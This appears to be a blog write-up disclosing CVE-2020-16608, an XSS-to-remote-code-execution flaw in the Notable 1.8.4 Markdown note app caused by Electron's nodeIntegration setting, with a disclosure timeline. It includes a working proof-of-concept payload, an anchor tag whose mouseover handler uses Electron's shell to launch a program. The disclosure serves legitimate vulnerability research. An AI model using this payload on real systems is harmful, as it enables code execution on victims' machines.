CVE-2020–16608

TL;DR

Notable 1.8.4 allows XSS via crafted Markdown text, with resultant remote code execution (because nodeIntegration in webPreferences is true).

About Notable

Notable is a markdown-based note-taking app that is developed using Electron framework. Notable was originally released as open-source but newer versions of it are no longer open-source.

Electron and Node Integration

Electron is a framework that enables you to create desktop applications with JavaScript, HTML, and CSS. These applications can then be packaged to run directly on macOS, Windows, or Linux, or distributed via the Mac App Store or the Microsoft Store.

const { app, BrowserWindow } = require('electron')function createWindow() {
const win = new BrowserWindow({
width: 800,
height: 600,
webPreferences: {
nodeIntegration: true
}
})
win.loadFile('index.html')
}

Exploitation

After installing Notable we reverse-engineered the app.asar file which reveals that nodeIntegration is set to true.

<a onmouseover="try{ const {shell} = require('electron'); shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">Harmless Link</a>

Disclosure Timeline

  • 2020–04–24 Disclosure to developer
  • 2020–04–24 Developer informed that this will be fixed in the upcoming builds.
  • 2020–12–04 Developer confirmed that as of v1.9.0-beta it is still unfixed but will be fixed in future builds.
  • 2020–12–10 Public disclosure of the vulnerability.

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Sourov Ghosh

Sourov Ghosh

I like computers and offensive security.